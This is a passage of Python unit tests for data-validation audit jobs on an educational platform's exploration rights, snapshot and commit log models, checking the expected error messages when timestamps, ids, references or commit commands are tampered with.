                'ExplorationModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'ExplorationSnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_invalid_exploration_version_in_model_id(self):
        """A snapshot content model whose id encodes a version larger
        than the exploration's version fails the version check.
        """
        # Id '0-3' claims version 3, but exploration '0' is at version 1.
        model_with_invalid_version_in_id = (
            exp_models.ExplorationSnapshotContentModel(
                id='0-3'))
        model_with_invalid_version_in_id.content = {}
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for exploration model '
                'version check of ExplorationSnapshotContentModel\', '
                '[u\'Entity id 0-3: Exploration model corresponding to '
                'id 0 has a version 1 which is less than '
                'the version 3 in snapshot content model id\']]'
            ), (
                u'[u\'fully-validated ExplorationSnapshotContentModel\', '
                '3]')]
        run_job_and_check_output(self, expected_output, sort=True)
class ExplorationRightsModelValidatorTests(test_utils.GenericTestBase):
    """Unit tests for ExplorationRightsModelAuditOneOffJob."""

    def setUp(self):
        """Creates three explorations and assigns an editor on '0' and a
        viewer on '2' so the rights models reference several user ids.
        """
        super(ExplorationRightsModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.owner = user_services.UserActionsInfo(self.owner_id)
        editor_email = 'user@editor.com'
        viewer_email = 'user@viewer.com'
        self.signup(editor_email, 'editor')
        self.signup(viewer_email, 'viewer')
        self.editor_id = self.get_user_id_from_email(editor_email)
        self.viewer_id = self.get_user_id_from_email(viewer_email)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(3)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        rights_manager.assign_role_for_exploration(
            self.owner, '0', self.editor_id, rights_manager.ROLE_EDITOR)
        rights_manager.assign_role_for_exploration(
            self.owner, '2', self.viewer_id, rights_manager.ROLE_VIEWER)
        self.model_instance_0 = exp_models.ExplorationRightsModel.get_by_id('0')
        self.model_instance_1 = exp_models.ExplorationRightsModel.get_by_id('1')
        self.model_instance_2 = exp_models.ExplorationRightsModel.get_by_id('2')
        # Job class picked up by run_job_and_check_output.
        self.job_class = (
            prod_validation_jobs_one_off.ExplorationRightsModelAuditOneOffJob)

    def test_standard_operation(self):
        """All three rights models validate cleanly after a publish."""
        rights_manager.publish_exploration(self.owner, '0')
        expected_output = [
            u'[u\'fully-validated ExplorationRightsModel\', 3]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time-field
        relation check for that one model only.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.commit(
            feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of ExplorationRightsModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), u'[u\'fully-validated ExplorationRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """With the clock mocked 13 hours back, the surviving model's
        last_updated lies in the future and fails the current-time check.
        """
        self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ExplorationRightsModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_first_published_datetime_greater_than_current_time(
            self):
        """An inflated first_published_msec (set after publishing) fails
        the first-published-msec check.
        """
        # NOTE: renamed from ..._datetime_than_current_time; the test asserts
        # the value is *greater than* the job-run time.
        rights_manager.publish_exploration(self.owner, '0')
        rights_manager.publish_exploration(self.owner, '1')
        self.model_instance_0.first_published_msec = (
            self.model_instance_0.first_published_msec * 1000000.0)
        self.model_instance_0.commit(feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for first published msec check '
                'of ExplorationRightsModel\', '
                '[u\'Entity id 0: The first_published_msec field has a '
                'value %s which is greater than the time when the job was '
                'run\']]'
            ) % (self.model_instance_0.first_published_msec),
            u'[u\'fully-validated ExplorationRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_exploration_model_failure(self):
        """Deleting the parent exploration fails the exploration_ids
        external-model check for its rights model.
        """
        exp_models.ExplorationModel.get_by_id('0').delete(
            feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_ids '
                'field check of ExplorationRightsModel\', '
                '[u"Entity id 0: based on field exploration_ids having '
                'value 0, expect model ExplorationModel with id 0 but '
                'it doesn\'t exist"]]'),
            u'[u\'fully-validated ExplorationRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_cloned_from_exploration_model_failure(self):
        """A cloned_from id with no matching exploration fails the
        cloned_from_exploration_ids check.
        """
        self.model_instance_0.cloned_from = 'invalid'
        self.model_instance_0.commit(feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for '
                'cloned_from_exploration_ids '
                'field check of ExplorationRightsModel\', '
                '[u"Entity id 0: based on field cloned_from_exploration_ids '
                'having value invalid, expect model ExplorationModel with id '
                'invalid but it doesn\'t exist"]]'),
            u'[u\'fully-validated ExplorationRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_owner_user_model_failure(self):
        """Deleting an owner's UserSettingsModel fails the owner_user_ids
        check.
        """
        rights_manager.assign_role_for_exploration(
            self.owner, '0', self.user_id, rights_manager.ROLE_OWNER)
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for owner_user_ids '
                'field check of ExplorationRightsModel\', '
                '[u"Entity id 0: based on field owner_user_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]') % (self.user_id, self.user_id),
            u'[u\'fully-validated ExplorationRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_editor_user_model_failure(self):
        """Deleting an editor's UserSettingsModel fails the editor_user_ids
        check.
        """
        user_models.UserSettingsModel.get_by_id(self.editor_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for editor_user_ids '
                'field check of ExplorationRightsModel\', '
                '[u"Entity id 0: based on field editor_user_ids having '
                'value %s, expect model UserSettingsModel with id %s but '
                'it doesn\'t exist"]]') % (
                    self.editor_id, self.editor_id),
            u'[u\'fully-validated ExplorationRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_viewer_user_model_failure(self):
        """Deleting a viewer's UserSettingsModel fails the viewer_user_ids
        check.
        """
        user_models.UserSettingsModel.get_by_id(self.viewer_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for viewer_user_ids '
                'field check of ExplorationRightsModel\', '
                '[u"Entity id 2: based on field viewer_user_ids having '
                'value %s, expect model UserSettingsModel with id %s but '
                'it doesn\'t exist"]]') % (
                    self.viewer_id, self.viewer_id),
            u'[u\'fully-validated ExplorationRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_snapshot_metadata_model_failure(self):
        """Deleting snapshot metadata '0-1' fails the snapshot_metadata_ids
        check.
        """
        exp_models.ExplorationRightsSnapshotMetadataModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_metadata_ids '
                'field check of ExplorationRightsModel\', '
                '[u"Entity id 0: based on field snapshot_metadata_ids having '
                'value 0-1, expect model '
                'ExplorationRightsSnapshotMetadataModel '
                'with id 0-1 but it doesn\'t exist"]]'
            ),
            u'[u\'fully-validated ExplorationRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_snapshot_content_model_failure(self):
        """Deleting snapshot content '0-1' fails the snapshot_content_ids
        check.
        """
        exp_models.ExplorationRightsSnapshotContentModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_content_ids '
                'field check of ExplorationRightsModel\', '
                '[u"Entity id 0: based on field snapshot_content_ids having '
                'value 0-1, expect model ExplorationRightsSnapshotContentModel '
                'with id 0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated ExplorationRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class ExplorationRightsSnapshotMetadataModelValidatorTests(
        test_utils.GenericTestBase):
    """Unit tests for ExplorationRightsSnapshotMetadataModelAuditOneOffJob."""

    def setUp(self):
        """Creates three explorations ('0' committed by self.user_id, the
        rest by the owner) so snapshot metadata models '0-1', '1-1' and
        '2-1' exist for the job to validate.
        """
        super(
            ExplorationRightsSnapshotMetadataModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(3)]
        for exp in explorations:
            if exp.id != '0':
                exp_services.save_new_exploration(self.owner_id, exp)
            else:
                exp_services.save_new_exploration(self.user_id, exp)
        self.model_instance_0 = (
            exp_models.ExplorationRightsSnapshotMetadataModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            exp_models.ExplorationRightsSnapshotMetadataModel.get_by_id(
                '1-1'))
        self.model_instance_2 = (
            exp_models.ExplorationRightsSnapshotMetadataModel.get_by_id(
                '2-1'))
        # Job class picked up by run_job_and_check_output.
        self.job_class = (
            prod_validation_jobs_one_off
            .ExplorationRightsSnapshotMetadataModelAuditOneOffJob)

    def test_standard_operation(self):
        """Untampered snapshot metadata models all validate cleanly."""
        expected_output = [
            u'[u\'fully-validated ExplorationRightsSnapshotMetadataModel\', 3]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time-field
        relation check for that one model only.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of ExplorationRightsSnapshotMetadataModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'ExplorationRightsSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """With the clock mocked 13 hours back, the surviving model's
        last_updated lies in the future and fails the current-time check.
        """
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ExplorationRightsSnapshotMetadataModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_exploration_rights_model_failure(self):
        """Deleting the rights model makes both of its snapshots ('0-1'
        and '0-2') fail the exploration_rights_ids check.
        """
        exp_models.ExplorationRightsModel.get_by_id('0').delete(
            self.user_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_rights_ids '
                'field check of ExplorationRightsSnapshotMetadataModel\', '
                '[u"Entity id 0-1: based on field exploration_rights_ids '
                'having value 0, expect model ExplorationRightsModel with '
                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'exploration_rights_ids having value 0, expect model '
                'ExplorationRightsModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'ExplorationRightsSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_committer_model_failure(self):
        """Deleting the committer's UserSettingsModel fails the
        committer_ids check.
        """
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for committer_ids field '
                'check of ExplorationRightsSnapshotMetadataModel\', '
                '[u"Entity id 0-1: based on field committer_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]'
            ) % (self.user_id, self.user_id), (
                u'[u\'fully-validated '
                'ExplorationRightsSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_invalid_exploration_version_in_model_id(self):
        """A snapshot id ('0-3') whose version exceeds the rights model's
        actual version (1) fails the version check.
        """
        model_with_invalid_version_in_id = (
            exp_models.ExplorationRightsSnapshotMetadataModel(
                id='0-3', committer_id=self.owner_id, commit_type='edit',
                commit_message='msg', commit_cmds=[{}]))
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for exploration rights model '
                'version check of ExplorationRightsSnapshotMetadataModel\', '
                '[u\'Entity id 0-3: ExplorationRights model corresponding to '
                'id 0 has a version 1 which is less than the version 3 in '
                'snapshot metadata model id\']]'
            ), (
                u'[u\'fully-validated '
                'ExplorationRightsSnapshotMetadataModel\', 3]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_commit_cmd_schema(self):
        """Commit cmds with a missing required attribute or an extra
        attribute each produce a distinct commit-cmd validation failure.
        """
        # NOTE: renamed from ..._schmea (typo).
        self.model_instance_0.commit_cmds = [{
            'cmd': 'change_exploration_status',
            'old_status': rights_manager.ACTIVITY_STATUS_PUBLIC,
        }, {
            'cmd': 'release_ownership',
            'invalid_attribute': 'invalid'
        }]
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit cmd '
                'change_exploration_status check of '
                'ExplorationRightsSnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation '
                'for command: {u\'old_status\': u\'public\', '
                'u\'cmd\': u\'change_exploration_status\'} '
                'failed with error: The following required '
                'attributes are missing: new_status"]]'
            ), (
                u'[u\'failed validation check for commit cmd '
                'release_ownership check of '
                'ExplorationRightsSnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'release_ownership\', '
                'u\'invalid_attribute\': u\'invalid\'} '
                'failed with error: The following extra attributes '
                'are present: invalid_attribute"]]'
            ), (
                u'[u\'fully-validated '
                'ExplorationRightsSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)
class ExplorationRightsSnapshotContentModelValidatorTests(
        test_utils.GenericTestBase):
    """Unit tests for ExplorationRightsSnapshotContentModelAuditOneOffJob."""

    def setUp(self):
        """Creates three explorations; saving each one also creates the
        rights snapshot content models '0-1', '1-1' and '2-1'.
        """
        super(ExplorationRightsSnapshotContentModelValidatorTests, self).setUp(
            )
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(3)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        self.model_instance_0 = (
            exp_models.ExplorationRightsSnapshotContentModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            exp_models.ExplorationRightsSnapshotContentModel.get_by_id(
                '1-1'))
        self.model_instance_2 = (
            exp_models.ExplorationRightsSnapshotContentModel.get_by_id(
                '2-1'))
        # Job class picked up by run_job_and_check_output.
        self.job_class = (
            prod_validation_jobs_one_off
            .ExplorationRightsSnapshotContentModelAuditOneOffJob)

    def test_standard_operation(self):
        """Untampered snapshot content models all validate cleanly."""
        expected_output = [
            u'[u\'fully-validated ExplorationRightsSnapshotContentModel\', 3]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time-field
        relation check for that one model only.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of ExplorationRightsSnapshotContentModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'ExplorationRightsSnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """With the clock mocked 13 hours back, the surviving model's
        last_updated lies in the future and fails the current-time check.
        """
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ExplorationRightsSnapshotContentModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_exploration_model_failure(self):
        """Deleting the rights model makes both of its snapshots ('0-1'
        and '0-2') fail the exploration_rights_ids check.
        """
        exp_models.ExplorationRightsModel.get_by_id('0').delete(
            self.owner_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_rights_ids '
                'field check of ExplorationRightsSnapshotContentModel\', '
                '[u"Entity id 0-1: based on field exploration_rights_ids '
                'having value 0, expect model ExplorationRightsModel with '
                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'exploration_rights_ids having value 0, expect model '
                'ExplorationRightsModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'ExplorationRightsSnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_invalid_exploration_version_in_model_id(self):
        """A snapshot id ('0-3') whose version exceeds the rights model's
        actual version (1) fails the version check.
        """
        model_with_invalid_version_in_id = (
            exp_models.ExplorationRightsSnapshotContentModel(
                id='0-3'))
        model_with_invalid_version_in_id.content = {}
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for exploration rights model '
                'version check of ExplorationRightsSnapshotContentModel\', '
                '[u\'Entity id 0-3: ExplorationRights model corresponding to '
                'id 0 has a version 1 which is less than the version 3 in '
                'snapshot content model id\']]'
            ), (
                u'[u\'fully-validated ExplorationRightsSnapshotContentModel\', '
                '3]')]
        run_job_and_check_output(self, expected_output, sort=True)
class ExplorationCommitLogEntryModelValidatorTests(test_utils.GenericTestBase):
    """Unit tests for ExplorationCommitLogEntryModelAuditOneOffJob."""

    def setUp(self):
        """Creates three explorations (producing 'exploration-<i>-1' commit
        log entries) plus one hand-built 'rights-1-1' entry.
        """
        super(ExplorationCommitLogEntryModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(3)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        self.rights_model_instance = (
            exp_models.ExplorationCommitLogEntryModel(
                id='rights-1-1', user_id=self.owner_id,
                username=self.OWNER_USERNAME, exploration_id='1',
                commit_type='edit', commit_message='', commit_cmds=[],
                post_commit_status=constants.ACTIVITY_STATUS_PUBLIC,
                post_commit_community_owned=False,
                post_commit_is_private=False))
        self.rights_model_instance.put()
        self.model_instance_0 = (
            exp_models.ExplorationCommitLogEntryModel.get_by_id(
                'exploration-0-1'))
        self.model_instance_1 = (
            exp_models.ExplorationCommitLogEntryModel.get_by_id(
                'exploration-1-1'))
        self.model_instance_2 = (
            exp_models.ExplorationCommitLogEntryModel.get_by_id(
                'exploration-2-1'))
        # Job class picked up by run_job_and_check_output.
        self.job_class = (
            prod_validation_jobs_one_off
            .ExplorationCommitLogEntryModelAuditOneOffJob)

    def test_standard_operation(self):
        """All entries validate; the update adds 'exploration-0-2', giving
        5 entries in total.
        """
        exp_services.update_exploration(
            self.owner_id, '0', [exp_domain.ExplorationChange({
                'cmd': 'edit_exploration_property',
                'property_name': 'title',
                'new_value': 'New title'
            })], 'Changes.')
        expected_output = [
            u'[u\'fully-validated ExplorationCommitLogEntryModel\', 5]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time-field
        relation check for that one entry only.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of ExplorationCommitLogEntryModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """With the clock mocked 13 hours back, the surviving entry's
        last_updated lies in the future and fails the current-time check.
        """
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        self.rights_model_instance.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ExplorationCommitLogEntryModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_exploration_model_failure(self):
        """Deleting the parent exploration makes both of its commit log
        entries fail the exploration_ids check.
        """
        exp_models.ExplorationModel.get_by_id('0').delete(
            feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_ids '
                'field check of ExplorationCommitLogEntryModel\', '
                '[u"Entity id exploration-0-1: based on field '
                'exploration_ids having value 0, expect model '
                'ExplorationModel with id 0 '
                'but it doesn\'t exist", u"Entity id exploration-0-2: based '
                'on field exploration_ids having value 0, expect model '
                'ExplorationModel with id 0 but it doesn\'t exist"]]'
            ), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_exploration_rights_model_failure(self):
        """Deleting the rights model makes the 'rights-1-1' entry fail the
        exploration_rights_ids check.
        """
        exp_models.ExplorationRightsModel.get_by_id('1').delete(
            feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_rights_ids '
                'field check of ExplorationCommitLogEntryModel\', '
                '[u"Entity id rights-1-1: based on field '
                'exploration_rights_ids having value 1, expect model '
                'ExplorationRightsModel with id 1 but it doesn\'t exist"]]'
            ), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
        run_job_and_check_output(
            self, expected_output, sort=True)

    def test_invalid_exploration_version_in_model_id(self):
        """An entry whose id version (3) exceeds the exploration's actual
        version (1) fails the version check.
        """
        model_with_invalid_version_in_id = (
            exp_models.ExplorationCommitLogEntryModel.create(
                '0', 3, self.owner_id, self.OWNER_USERNAME, 'edit',
                'msg', [{}],
                constants.ACTIVITY_STATUS_PUBLIC, False))
        model_with_invalid_version_in_id.exploration_id = '0'
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for exploration model '
                'version check of ExplorationCommitLogEntryModel\', '
                '[u\'Entity id %s: Exploration model corresponding '
                'to id 0 has a version 1 which is less than '
                'the version 3 in commit log entry model id\']]'
            ) % (model_with_invalid_version_in_id.id),
            u'[u\'fully-validated ExplorationCommitLogEntryModel\', 4]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_id(self):
        """An entry id that matches neither the 'exploration-' nor
        'rights-' pattern fails the model-id regex check (and, with [{}]
        as cmds, the commit-cmd check too).
        """
        model_with_invalid_id = (
            exp_models.ExplorationCommitLogEntryModel(
                id='invalid-0-1', user_id=self.owner_id,
                username=self.OWNER_USERNAME, commit_type='edit',
                commit_message='msg', commit_cmds=[{}],
                post_commit_status=constants.ACTIVITY_STATUS_PUBLIC,
                post_commit_is_private=False))
        model_with_invalid_id.exploration_id = '0'
        model_with_invalid_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for model id check of '
                'ExplorationCommitLogEntryModel\', '
                '[u\'Entity id %s: Entity id does not match regex pattern\']]'
            ) % (model_with_invalid_id.id), (
                u'[u\'failed validation check for commit cmd check of '
                'ExplorationCommitLogEntryModel\', [u\'Entity id invalid-0-1: '
                'No commit command domain object defined for entity with '
                'commands: [{}]\']]'),
            u'[u\'fully-validated ExplorationCommitLogEntryModel\', 4]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_commit_type(self):
        """An unrecognized commit_type fails the commit-type check."""
        self.model_instance_0.commit_type = 'invalid'
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit type check of '
                'ExplorationCommitLogEntryModel\', '
                '[u\'Entity id exploration-0-1: Commit type invalid is '
                'not allowed\']]'
            ), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_post_commit_status(self):
        """An unrecognized post_commit_status fails the post-commit-status
        check.
        """
        self.model_instance_0.post_commit_status = 'invalid'
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for post commit status check '
                'of ExplorationCommitLogEntryModel\', '
                '[u\'Entity id exploration-0-1: Post commit status invalid '
                'is invalid\']]'
            ), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_true_post_commit_is_private(self):
        """post_commit_is_private=True contradicts a 'public' status and
        fails the post-commit-is-private check.
        """
        self.model_instance_0.post_commit_status = 'public'
        self.model_instance_0.post_commit_is_private = True
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for post commit is private '
                'check of ExplorationCommitLogEntryModel\', '
                '[u\'Entity id %s: Post commit status is '
                'public but post_commit_is_private is True\']]'
            ) % self.model_instance_0.id,
            u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_false_post_commit_is_private(self):
        """post_commit_is_private=False contradicts a 'private' status and
        fails the post-commit-is-private check.
        """
        self.model_instance_0.post_commit_status = 'private'
        self.model_instance_0.post_commit_is_private = False
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for post commit is private '
                'check of ExplorationCommitLogEntryModel\', '
                '[u\'Entity id %s: Post commit status is '
                'private but post_commit_is_private is False\']]'
            ) % self.model_instance_0.id,
            u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_commit_cmd_schema(self):
        """Commit cmds with missing required or extra attributes each
        produce a distinct commit-cmd validation failure.
        """
        # NOTE: renamed from ..._schmea (typo).
        self.model_instance_0.commit_cmds = [{
            'cmd': 'add_state'
        }, {
            'cmd': 'delete_state',
            'invalid_attribute': 'invalid'
        }]
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit cmd '
                'delete_state check of '
                'ExplorationCommitLogEntryModel\', '
                '[u"Entity id exploration-0-1: Commit command domain '
                'validation for command: {u\'cmd\': u\'delete_state\', '
                'u\'invalid_attribute\': u\'invalid\'} '
                'failed with error: The following required attributes '
                'are missing: state_name, '
                'The following extra attributes are present: '
                'invalid_attribute"]]'
            ), (
                u'[u\'failed validation check for commit cmd '
                'add_state check of '
                'ExplorationCommitLogEntryModel\', '
                '[u"Entity id exploration-0-1: Commit command domain '
                'validation for command: {u\'cmd\': u\'add_state\'} '
                'failed with error: The following required attributes '
                'are missing: state_name"]]'
            ), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)
class ExpSummaryModelValidatorTests(test_utils.GenericTestBase):
    def setUp(self):
        """Creates three tagged explorations with varied language codes,
        assigns editor/viewer roles, makes a contributor edit on '0', and
        records two ratings, so the ExpSummaryModels have populated
        contributor, rights and rating data for the audit job.
        """
        super(ExpSummaryModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
